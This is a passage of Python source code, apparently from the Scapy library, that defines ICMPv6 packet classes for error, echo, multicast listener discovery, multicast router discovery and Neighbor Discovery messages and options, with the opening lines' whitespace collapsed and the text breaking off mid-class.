creation fragId = random.randint(0, 0xffffffff) # random id ... if fragHeader.id is not None: # ... 
except id provided by user fragId = fragHeader.id fragHeader.m = 1 fragHeader.id = fragId fragHeader.nh = nh # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... while True: if (len(remain) > lastFragSize): tmp = remain[:innerFragSize] remain = remain[innerFragSize:] fragHeader.offset = fragOffset # update offset fragOffset += (innerFragSize // 8) # compute new one if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) res.append(tempo) else: fragHeader.offset = fragOffset # update offSet fragHeader.m = 0 if IPv6 in unfragPart: unfragPart[IPv6].plen = None tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) res.append(tempo) break return res ############################################################################# ############################################################################# # ICMPv6* Classes # ############################################################################# ############################################################################# icmp6typescls = {1: "ICMPv6DestUnreach", 2: "ICMPv6PacketTooBig", 3: "ICMPv6TimeExceeded", 4: "ICMPv6ParamProblem", 128: "ICMPv6EchoRequest", 129: "ICMPv6EchoReply", 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 131: "ICMPv6MLReport", 132: "ICMPv6MLDone", 133: "ICMPv6ND_RS", 134: "ICMPv6ND_RA", 135: "ICMPv6ND_NS", 136: "ICMPv6ND_NA", 137: "ICMPv6ND_Redirect", # 138: Do Me - RFC 2894 - Seems painful 139: "ICMPv6NIQuery", 140: "ICMPv6NIReply", 141: "ICMPv6ND_INDSol", 142: "ICMPv6ND_INDAdv", 143: "ICMPv6MLReport2", 144: "ICMPv6HAADRequest", 145: "ICMPv6HAADReply", 146: "ICMPv6MPSol", 147: "ICMPv6MPAdv", # 148: Do Me - SEND related - RFC 3971 # 149: Do Me - SEND related - RFC 3971 151: "ICMPv6MRD_Advertisement", 152: "ICMPv6MRD_Solicitation", 153: "ICMPv6MRD_Termination", # 154: Do Me - FMIPv6 Messages - RFC 5568 155: "ICMPv6RPL", # RFC 6550 } icmp6typesminhdrlen = {1: 8, 2: 8, 3: 8, 4: 8, 128: 8, 129: 8, 130: 24, 131: 24, 132: 24, 133: 8, 134: 
16, 135: 24, 136: 24, 137: 40, # 139: # 140 141: 8, 142: 8, 143: 8, 144: 8, 145: 8, 146: 8, 147: 8, 151: 8, 152: 4, 153: 4, 155: 4 } icmp6types = {1: "Destination unreachable", 2: "Packet too big", 3: "Time exceeded", 4: "Parameter problem", 100: "Private Experimentation", 101: "Private Experimentation", 128: "Echo Request", 129: "Echo Reply", 130: "MLD Query", 131: "MLD Report", 132: "MLD Done", 133: "Router Solicitation", 134: "Router Advertisement", 135: "Neighbor Solicitation", 136: "Neighbor Advertisement", 137: "Redirect Message", 138: "Router Renumbering", 139: "ICMP Node Information Query", 140: "ICMP Node Information Response", 141: "Inverse Neighbor Discovery Solicitation Message", 142: "Inverse Neighbor Discovery Advertisement Message", 143: "MLD Report Version 2", 144: "Home Agent Address Discovery Request Message", 145: "Home Agent Address Discovery Reply Message", 146: "Mobile Prefix Solicitation", 147: "Mobile Prefix Advertisement", 148: "Certification Path Solicitation", 149: "Certification Path Advertisement", 151: "Multicast Router Advertisement", 152: "Multicast Router Solicitation", 153: "Multicast Router Termination", 155: "RPL Control Message", 200: "Private Experimentation", 201: "Private Experimentation"} class _ICMPv6(Packet): name = "ICMPv6 dummy class" overload_fields = {IPv6: {"nh": 58}} def post_build(self, p, pay): p += pay if self.cksum is None: chksum = in6_chksum(58, self.underlayer, p) p = p[:2] + struct.pack("!H", chksum) + p[4:] return p def hashret(self): return self.payload.hashret() def answers(self, other): # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 
if (isinstance(self.underlayer, IPerror6) or isinstance(self.underlayer, _IPv6ExtHdr) and isinstance(other, _ICMPv6)): if not ((self.type == other.type) and (self.code == other.code)): return 0 return 1 return 0 class _ICMPv6Error(_ICMPv6): name = "ICMPv6 errors dummy class" def guess_payload_class(self, p): return IPerror6 class ICMPv6Unknown(_ICMPv6): name = "Scapy6 ICMPv6 fallback class" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteField("code", 0), XShortField("cksum", None), StrField("msgbody", "")] # RFC 2460 # class ICMPv6DestUnreach(_ICMPv6Error): name = "ICMPv6 Destination Unreachable" fields_desc = [ByteEnumField("type", 1, icmp6types), ByteEnumField("code", 0, {0: "No route to destination", 1: "Communication with destination administratively prohibited", # noqa: E501 2: "Beyond scope of source address", # noqa: E501 3: "Address unreachable", 4: "Port unreachable"}), XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] class ICMPv6PacketTooBig(_ICMPv6Error): name = "ICMPv6 Packet Too Big" fields_desc = [ByteEnumField("type", 2, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("mtu", 1280)] class ICMPv6TimeExceeded(_ICMPv6Error): name = "ICMPv6 Time Exceeded" fields_desc = [ByteEnumField("type", 3, icmp6types), ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 1: "fragment reassembly time exceeded"}), # noqa: E501 XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] # The default pointer value is set to the next header field of # the encapsulated IPv6 packet class ICMPv6ParamProblem(_ICMPv6Error): name = "ICMPv6 Parameter Problem" fields_desc = [ByteEnumField("type", 4, icmp6types), ByteEnumField( "code", 0, {0: "erroneous header field encountered", 1: "unrecognized Next Header type encountered", 2: "unrecognized IPv6 option encountered", 3: "first fragment has incomplete header chain"}), XShortField("cksum", None), IntField("ptr", 6)] class 
ICMPv6EchoRequest(_ICMPv6): name = "ICMPv6 Echo Request" fields_desc = [ByteEnumField("type", 128, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", 0), XShortField("seq", 0), StrField("data", "")] def mysummary(self): return self.sprintf("%name% (id: %id% seq: %seq%)") def hashret(self): return struct.pack("HH", self.id, self.seq) + self.payload.hashret() class ICMPv6EchoReply(ICMPv6EchoRequest): name = "ICMPv6 Echo Reply" type = 129 def answers(self, other): # We could match data content between request and reply. return (isinstance(other, ICMPv6EchoRequest) and self.id == other.id and self.seq == other.seq and self.data == other.data) # ICMPv6 Multicast Listener Discovery (RFC2710) # # tous les messages MLD sont emis avec une adresse source lien-locale # -> Y veiller dans le post_build si aucune n'est specifiee # La valeur de Hop-Limit doit etre de 1 # "and an IPv6 Router Alert option in a Hop-by-Hop Options # header. (The router alert option is necessary to cause routers to # examine MLD messages sent to multicast addresses in which the router # itself has no interest" class _ICMPv6ML(_ICMPv6): fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 0), ShortField("reserved", 0), IP6Field("mladdr", "::")] # general queries are sent to the link-scope all-nodes multicast # address ff02::1, with a multicast address field of 0 and a MRD of # [Query Response Interval] # Default value for mladdr is set to 0 for a General Query, and # overloaded by the user for a Multicast Address specific query # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. 
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    """MLDv1 Multicast Listener Query (type 130)."""
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}


# TODO : See what we can do to automatically include a Router Alert
#        Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    """MLDv1 Multicast Listener Report (type 131)."""
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}

    def answers(self, query):
        """Check the query type"""
        return ICMPv6MLQuery in query


# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
#        Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    """MLDv1 Multicast Listener Done (type 132)."""
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}


# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810)

class ICMPv6MLQuery2(_ICMPv6):  # RFC 3810
    """MLDv2 Multicast Listener Query (type 130, extended layout)."""
    name = "MLDv2 - Multicast Listener Query"
    fields_desc = [ByteEnumField("type", 130, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ShortField("mrd", 10000),
                   ShortField("reserved", 0),
                   IP6Field("mladdr", "::"),
                   BitField("Resv", 0, 4),
                   BitField("S", 0, 1),
                   BitField("QRV", 0, 3),
                   ByteField("QQIC", 0),
                   ShortField("sources_number", None),
                   IP6ListField("sources", [],
                                count_from=lambda pkt: pkt.sources_number)]

    # RFC 3810 - 5.1. Multicast Listener Query Message (was mislabelled RFC8810)
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'sources_number' field when needed"""
        if self.sources_number is None:
            # sources_number lives at bytes 26-27 of the built header.
            srcnum = struct.pack("!H", len(self.sources))
            packet = packet[:26] + srcnum + packet[28:]
        return _ICMPv6.post_build(self, packet, payload)


class ICMPv6MLDMultAddrRec(Packet):
    """A single MLDv2 Multicast Address Record (carried in a Report)."""
    name = "ICMPv6 MLDv2 - Multicast Address Record"
    fields_desc = [ByteField("rtype", 4),
                   FieldLenField("auxdata_len", None,
                                 length_of="auxdata", fmt="B"),
                   FieldLenField("sources_number", None,
                                 length_of="sources",
                                 adjust=lambda p, num: num // 16),
                   IP6Field("dst", "::"),
                   IP6ListField("sources", [],
                                length_from=lambda p: 16 * p.sources_number),
                   StrLenField("auxdata", "",
                               length_from=lambda p: p.auxdata_len)]

    def default_payload_class(self, packet):
        """Multicast Address Record followed by another one"""
        return self.__class__


class ICMPv6MLReport2(_ICMPv6):  # RFC 3810
    """MLDv2 Multicast Listener Report (type 143)."""
    name = "MLDv2 - Multicast Listener Report"
    fields_desc = [ByteEnumField("type", 143, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None),
                   ShortField("reserved", 0),
                   ShortField("records_number", None),
                   PacketListField("records", [],
                                   ICMPv6MLDMultAddrRec,
                                   count_from=lambda p: p.records_number)]

    # RFC 3810 - 5.2. Multicast Listener Report Message (was mislabelled RFC8810)
    overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}

    def post_build(self, packet, payload):
        """Compute the 'records_number' field when needed"""
        if self.records_number is None:
            recnum = struct.pack("!H", len(self.records))
            packet = packet[:6] + recnum + packet[8:]
        return _ICMPv6.post_build(self, packet, payload)

    def answers(self, query):
        """Check the query type"""
        return isinstance(query, ICMPv6MLQuery2)


# ICMPv6 MRD - Multicast Router Discovery (RFC 4286)

# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
#            option for all MRD packets. This could be done in a specific
#            way when IPv6 is the under layer with some specific keyword
#            like 'exthdr'.
#            This would allow to keep compatibility with
#            providing IPv6 fields to be overloaded in fields_desc.
#
#            At the moment, if user inserts an IPv6 Router alert option
#            none of the IPv6 default values of IPv6 layer will be set.


class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Advertisement (RFC 4286, type 151)."""
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [ByteEnumField("type", 151, icmp6types),
                   ByteField("advinter", 20),
                   XShortField("cksum", None),
                   ShortField("queryint", 0),
                   ShortField("robustness", 0)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        # Fixed 8-byte message body; anything after is padding/payload.
        return s[:8], s[8:]


class ICMPv6MRD_Solicitation(_ICMPv6):
    """Multicast Router Solicitation (RFC 4286, type 152)."""
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [ByteEnumField("type", 152, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        return s[:4], s[4:]


class ICMPv6MRD_Termination(_ICMPv6):
    """Multicast Router Termination (RFC 4286, type 153)."""
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [ByteEnumField("type", 153, icmp6types),
                   ByteField("res", 0),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
    # IPv6 Router Alert requires manual inclusion

    def extract_padding(self, s):
        return s[:4], s[4:]


# ICMPv6 Neighbor Discovery (RFC 2461)

icmp6ndopts = {1: "Source Link-Layer Address",
               2: "Target Link-Layer Address",
               3: "Prefix Information",
               4: "Redirected Header",
               5: "MTU",
               6: "NBMA Shortcut Limit Option",  # RFC2491
               7: "Advertisement Interval Option",
               8: "Home Agent Information Option",
               9: "Source Address List",
               10: "Target Address List",
               11: "CGA Option",  # RFC 3971
               12: "RSA Signature Option",  # RFC 3971
               13: "Timestamp Option",  # RFC 3971
               14: "Nonce option",  # RFC 3971
               15: "Trust Anchor Option",  # RFC 3971
               16: "Certificate Option",  # RFC 3971
               17: "IP Address Option",  # RFC 4068
               18: "New Router Prefix Information Option",  # RFC 4068
               19: "Link-layer Address Option",  # RFC 4068
               20: "Neighbor Advertisement Acknowledgement Option",
               21: "CARD Request Option",  # RFC 4065/4066/4067
               22: "CARD Reply Option",  # RFC 4065/4066/4067
               23: "MAP Option",  # RFC 4140
               24: "Route Information Option",  # RFC 4191
               25: "Recursive DNS Server Option",
               26: "IPv6 Router Advertisement Flags Option"
               }

# Maps an ND option type to the scapy class implementing it.
icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
                  2: "ICMPv6NDOptDstLLAddr",
                  3: "ICMPv6NDOptPrefixInfo",
                  4: "ICMPv6NDOptRedirectedHdr",
                  5: "ICMPv6NDOptMTU",
                  6: "ICMPv6NDOptShortcutLimit",
                  7: "ICMPv6NDOptAdvInterval",
                  8: "ICMPv6NDOptHAInfo",
                  9: "ICMPv6NDOptSrcAddrList",
                  10: "ICMPv6NDOptTgtAddrList",
                  # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
                  # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
                  # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
                  # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
                  # 15: Do Me,
                  # 16: Do Me,
                  17: "ICMPv6NDOptIPAddr",
                  18: "ICMPv6NDOptNewRtrPrefix",
                  19: "ICMPv6NDOptLLA",
                  # 20: Do Me,
                  # 21: Do Me,
                  # 22: Do Me,
                  23: "ICMPv6NDOptMAP",
                  24: "ICMPv6NDOptRouteInfo",
                  25: "ICMPv6NDOptRDNSS",
                  26: "ICMPv6NDOptEFA",
                  31: "ICMPv6NDOptDNSSL"
                  }

icmp6ndraprefs = {0: "Medium (default)",
                  1: "High",
                  2: "Reserved",
                  3: "Low"}  # RFC 4191


class _ICMPv6NDGuessPayload:
    """Mixin: dispatch the next bytes to the right ND option class."""
    name = "Dummy ND class that implements guess_payload_class()"

    def guess_payload_class(self, p):
        if len(p) > 1:
            return icmp6ndoptscls.get(orb(p[0]), Raw)  # s/Raw/ICMPv6NDOptUnknown/g ?  # noqa: E501


# Beginning of ICMPv6 Neighbor Discovery Options.

class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """Catch-all for ND option types scapy does not implement."""
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [ByteField("type", None),
                   FieldLenField("len", None, length_of="data", fmt="B",
                                 adjust=lambda pkt, x: x + 2),
                   StrLenField("data", "",
                               length_from=lambda pkt: pkt.len - 2)]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revoir le coup du ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """ND option 1: link-layer address of the sender."""
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [ByteField("type", 1),
                   ByteField("len", 1),
                   MACField("lladdr", ETHER_ANY)]

    def mysummary(self):
        return self.sprintf("%name% %lladdr%")


class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """ND option 2: link-layer address of the target."""
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2


class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """ND option 3: on-link prefix advertised by a router."""
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [ByteField("type", 3),
                   ByteField("len", 4),
                   ByteField("prefixlen", 64),
                   BitField("L", 1, 1),
                   BitField("A", 1, 1),
                   BitField("R", 0, 1),
                   BitField("res1", 0, 5),
                   XIntField("validlifetime", 0xffffffff),
                   XIntField("preferredlifetime", 0xffffffff),
                   XIntField("res2", 0x00000000),
                   IP6Field("prefix", "::")]

    def mysummary(self):
        return self.sprintf("%name% %prefix%/%prefixlen% "
                            "On-link %L% Autonomous Address %A% "
                            "Router Address %R%")

# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)


class TruncPktLenField(PacketLenField):
    """PacketLenField that truncates the embedded packet to an 8-byte
    multiple (minus ``cur_shift``), as required by the Redirected
    Header ND option."""
    __slots__ = ["cur_shift"]

    def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):  # noqa: E501
        PacketLenField.__init__(self, name, default, cls, length_from=length_from)  # noqa: E501
        self.cur_shift = cur_shift

    def getfield(self, pkt, s):
        tmp_len = self.length_from(pkt)
        i = self.m2i(pkt, s[:tmp_len])
        return s[tmp_len:], i

    def m2i(self, pkt, m):
        s = None
        try:  # It can happen we have sth shorter than 40 bytes
            s = self.cls(m)
        except Exception:
            return conf.raw_layer(m)
        return s

    def i2m(self, pkt, x):
        s = raw(x)
        tmp_len = len(s)
        # Drop the trailing bytes that break 8-byte alignment.
        r = (tmp_len + self.cur_shift) % 8
        tmp_len = tmp_len - r
        return s[:tmp_len]

    def i2len(self, pkt, i):
        return len(self.i2m(pkt, i))


# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    """ND option 4: (truncated) copy of the redirected packet."""
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [ByteField("type", 4),
                   FieldLenField("len", None, length_of="pkt", fmt="B",
                                 adjust=lambda pkt, x: (x + 8) // 8),
                   StrFixedLenField("res", b"\x00" * 6, 6),
                   TruncPktLenField("pkt", b"", IPv6, 8,
                                    length_from=lambda pkt: 8 * pkt.len - 8)]

# See which value should be used for default MTU instead of 1280


class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    """ND option 5: link MTU."""
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [ByteField("type", 5),
                   ByteField("len", 1),
                   XShortField("res", 0),
                   IntField("mtu", 1280)]

    def mysummary(self):
        return self.sprintf("%name% %mtu%")


class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    """ND option 6: NBMA shortcut limit."""
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [ByteField("type", 6),
                   ByteField("len", 1),
                   ByteField("shortcutlim", 40),  # XXX
                   ByteField("res1", 0),
                   IntField("res2", 0)]


class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    """ND option 7: router advertisement interval (Mobile IPv6)."""
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [ByteField("type", 7),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   IntField("advint", 0)]

    def mysummary(self):
        return self.sprintf("%name% %advint% milliseconds")


class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    """ND option 8: home agent preference/lifetime (Mobile IPv6)."""
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [ByteField("type", 8),
                   ByteField("len", 1),
                   ShortField("res", 0),
                   ShortField("pref", 0),
                   ShortField("lifetime", 1)]

    def mysummary(self):
        return self.sprintf("%name% %pref% %lifetime% seconds")

# type 9  : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support


class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """ND option 17: IP address option (fast handover for MIPv6)."""
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [ByteField("type", 17),
                   ByteField("len", 3),
                   ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
                                                2: "New Care-Of Address",
                                                3: "NAR's IP address"}),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("addr", "::")]


class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """ND option 18: new router prefix information (FH for MIPv6)."""
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 18),
                   ByteField("len", 3),
                   ByteField("optcode", 0),
                   ByteField("plen", 64),
                   IntField("res", 0),
                   IP6Field("prefix", "::")]


_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
                        1: "LLA for the new AP",
                        2: "LLA of the MN",
                        3: "LLA of the NAR",
                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501


class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    """ND option 19: link-layer address (FH for MIPv6)."""
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [ByteField("type", 19),
                   ByteField("len", 1),
                   ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
                   MACField("lla", ETHER_ANY)]  # We only support ethernet


class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):  # RFC 4140
    """ND option 23: Mobility Anchor Point option (HMIPv6)."""
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [ByteField("type", 23),
                   ByteField("len", 3),
                   BitField("dist", 1, 4),
                   BitField("pref", 15, 4),  # highest availability
                   BitField("R", 1, 1),
                   BitField("res", 0, 7),
                   IntField("validlifetime", 0xffffffff),
                   IP6Field("addr", "::")]


class _IP6PrefixField(IP6Field):
    """IPv6 prefix whose wire length is derived from the option's 'len'
    field (8 * (len - 1) bytes), zero-padded back to 16 bytes on
    dissection."""
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)

    def getfield(self, pkt, s):
        tmp_len = self.length_from(pkt)
        p = s[:tmp_len]
        if tmp_len < 16:
            p += b'\x00' * (16 - tmp_len)
        return s[tmp_len:], self.m2i(pkt, p)

    def i2len(self, pkt, x):
        return len(self.i2m(pkt, x))

    def i2m(self, pkt, x):
        tmp_len = pkt.len
        if x is None:
            x = "::"
            if tmp_len is None:
                tmp_len = 1
        x = inet_pton(socket.AF_INET6, x)
        if tmp_len is None:
            return x
        if tmp_len in [0, 1]:
            return b""
        if tmp_len in [2, 3]:
            return x[:8 * (tmp_len - 1)]
        return x + b'\x00' * 8 * (tmp_len - 3)


class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    """ND option 24: more-specific route advertised by a router."""
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [ByteField("type", 24),
                   FieldLenField("len", None, length_of="prefix", fmt="B",
                                 adjust=lambda pkt, x: x // 8 + 1),
                   ByteField("plen", None),
                   BitField("res1", 0, 3),
                   BitEnumField("prf", 0, 2, icmp6ndraprefs),
                   BitField("res2", 0, 3),
                   IntField("rtlifetime", 0xffffffff),
                   _IP6PrefixField("prefix", None)]

    def mysummary(self):
        return self.sprintf("%name% %prefix%/%plen% Preference %prf%")


class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    """ND option 25: recursive DNS servers."""
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [ByteField("type", 25),
                   FieldLenField("len", None, count_of="dns", fmt="B",
                                 adjust=lambda pkt, x: 2 * x + 1),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   IP6ListField("dns", [],
                                length_from=lambda pkt: 8 * (pkt.len - 1))]

    def mysummary(self):
        return self.sprintf("%name% " + ", ".join(self.dns))


class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    """ND option 26: expanded RA flags."""
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [ByteField("type", 26),
                   ByteField("len", 1),
                   BitField("res", 0, 48)]
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
# described in section 3.1 of RFC 1035
# XXX Label should be at most 63 octets in length : we do not enforce it
#     Total length of domain should be 255 : we do not enforce it either
class DomainNameListField(StrLenField):
    """List of RFC1035-encoded domain names, optionally padded to an
    8-byte multiple (as required by the DNSSL ND option)."""
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, fld=None, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, fld, length_from)

    def i2len(self, pkt, x):
        return len(self.i2m(pkt, x))

    def m2i(self, pkt, x):
        x = plain_str(x)  # Decode bytes to string
        res = []
        while x:
            # Get a name until \x00 is reached
            cur = []
            while x and ord(x[0]) != 0:
                tmp_len = ord(x[0])
                cur.append(x[1:tmp_len + 1])
                x = x[tmp_len + 1:]
            if self.padded:
                # Discard following \x00 in padded mode
                if len(cur):
                    res.append(".".join(cur) + ".")
            else:
                # Store the current name
                res.append(".".join(cur) + ".")
            if x and ord(x[0]) == 0:
                x = x[1:]
        return res

    def i2m(self, pkt, x):
        def conditionalTrailingDot(z):
            if z and orb(z[-1]) == 0:
                return z
            return z + b'\x00'
        # Build the encode names
        tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x)  # Also encode string to bytes  # noqa: E501
        ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)

        # In padded mode, add some \x00 bytes
        if self.padded and not len(ret_string) % self.padded_unit == 0:
            ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)  # noqa: E501

        return ret_string


class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    """ND option 31: DNS search list."""
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [ByteField("type", 31),
                   FieldLenField("len", None, length_of="searchlist", fmt="B",
                                 adjust=lambda pkt, x: 1 + x // 8),
                   ShortField("res", None),
                   IntField("lifetime", 0xffffffff),
                   DomainNameListField("searchlist", [],
                                       length_from=lambda pkt: 8 * pkt.len - 8,
                                       padded=True)
                   ]

    def mysummary(self):
        return self.sprintf("%name% " + ", ".join(self.searchlist))

# End of ICMPv6 Neighbor Discovery Options.


class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    """Router Solicitation (type 133)."""
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [ByteEnumField("type", 133, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}


class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    """Router Advertisement (type 134)."""
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [ByteEnumField("type", 134, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   ByteField("chlim", 0),
                   BitField("M", 0, 1),
                   BitField("O", 0, 1),
                   BitField("H", 0, 1),
                   BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
                   BitField("P", 0, 1),
                   BitField("res", 0, 2),
                   ShortField("routerlifetime", 1800),
                   IntField("reachabletime", 0),
                   IntField("retranstimer", 0)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        return isinstance(other, ICMPv6ND_RS)

    def mysummary(self):
        return self.sprintf("%name% Lifetime %routerlifetime% "
                            "Hop Limit %chlim% Preference %prf% "
                            "Managed %M% Other %O% Home %H%")


class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Solicitation (type 135)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [ByteEnumField("type", 135, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   IntField("res", 0),
                   IP6Field("tgt", "::")]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        return self.sprintf("%name% (tgt: %tgt%)")

    def hashret(self):
        # Pair NS/NA on the target address.
        return bytes_encode(self.tgt) + self.payload.hashret()


class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Advertisement (type 136)."""
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [ByteEnumField("type", 136, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   BitField("R", 1, 1),
